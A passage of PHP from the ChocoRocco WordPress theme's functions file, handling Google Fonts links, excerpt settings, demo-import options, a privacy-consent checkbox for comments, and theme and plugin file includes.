$links['google_fonts'] = sprintf('%s://fonts.googleapis.com/css?family=%s&subset=%s', chocorocco_get_protocol(), $google_fonts, chocorocco_get_theme_option('load_fonts_subset'));
}
}
}
return $links;
}
}
// Return links for WP Editor
if ( !function_exists('chocorocco_theme_fonts_for_editor') ) {
function chocorocco_theme_fonts_for_editor() {
$links = array_values(chocorocco_theme_fonts_links());
if (is_array($links) && count($links) > 0) {
for ($i=0; $i<count($links); $i++) {
$links[$i] = str_replace(',', '%2C', $links[$i]);
}
}
return $links;
}
}
//-------------------------------------------------------
//-- The Excerpt
//-------------------------------------------------------
if ( !function_exists('chocorocco_excerpt_length') ) {
function chocorocco_excerpt_length( $length ) {
return max(1, chocorocco_get_theme_setting('max_excerpt_length'));
}
}
if ( !function_exists('chocorocco_excerpt_more') ) {
function chocorocco_excerpt_more( $more ) {
return '…';
}
}
//------------------------------------------------------------------------
// One-click import support
//------------------------------------------------------------------------
// Set theme specific importer options
if ( !function_exists( 'chocorocco_importer_set_options' ) ) {
function chocorocco_importer_set_options($options=array()) {
if (is_array($options)) {
// Save or not installer's messages to the log-file
$options['debug'] = false;
// Prepare demo data
$options['demo_url'] = esc_url(chocorocco_get_protocol() . '://demofiles.ancorathemes.com/chocorocco/');
// Required plugins
$options['required_plugins'] = chocorocco_storage_get('required_plugins');
// Default demo
$options['files']['default']['title'] = esc_html__('ChocoRocco Demo', 'chocorocco');
$options['files']['default']['domain_dev'] = esc_url('http://chocorocco.dv.ancorathemes.com'); // Developers domain
$options['files']['default']['domain_demo']= esc_url('http://chocorocco.ancorathemes.com'); // Demo-site domain
}
return $options;
}
}
// Add checkbox with "I agree ..."
if ( ! function_exists( 'chocorocco_comment_form_agree' ) ) {
add_filter('comment_form_fields', 'chocorocco_comment_form_agree', 11);
function chocorocco_comment_form_agree( $comment_fields ) {
$privacy_text = chocorocco_get_privacy_text();
if ( ! empty( $privacy_text ) ) {
$comment_fields['i_agree_privacy_policy'] = chocorocco_single_comments_field(
array(
'form_style' => 'default',
'field_type' => 'checkbox',
'field_req' => '',
'field_icon' => '',
'field_value' => '1',
'field_name' => 'i_agree_privacy_policy',
'field_title' => $privacy_text,
)
);
}
return $comment_fields;
}
}
//-------------------------------------------------------
//-- Include theme (or child) PHP-files
//-------------------------------------------------------
require_once CHOCOROCCO_THEME_DIR . 'includes/utils.php';
require_once CHOCOROCCO_THEME_DIR . 'includes/storage.php';
require_once CHOCOROCCO_THEME_DIR . 'includes/lists.php';
require_once CHOCOROCCO_THEME_DIR . 'includes/wp.php';
if (is_admin()) {
require_once CHOCOROCCO_THEME_DIR . 'includes/tgmpa/class-tgm-plugin-activation.php';
require_once CHOCOROCCO_THEME_DIR . 'includes/admin.php';
}
require_once CHOCOROCCO_THEME_DIR . 'theme-options/theme.customizer.php';
require_once CHOCOROCCO_THEME_DIR . 'theme-specific/theme.tags.php';
require_once CHOCOROCCO_THEME_DIR . 'theme-specific/theme.hovers/theme.hovers.php';
// Plugins support
if (is_array($CHOCOROCCO_STORAGE['required_plugins']) && count($CHOCOROCCO_STORAGE['required_plugins']) > 0) {
foreach ($CHOCOROCCO_STORAGE['required_plugins'] as $plugin_slug) {
$plugin_slug = chocorocco_esc($plugin_slug);
$plugin_path = CHOCOROCCO_THEME_DIR . sprintf('plugins/%s/%s.php', $plugin_slug, $plugin_slug);
if (file_exists($plugin_path)) { require_once $plugin_path; }
}
}
?>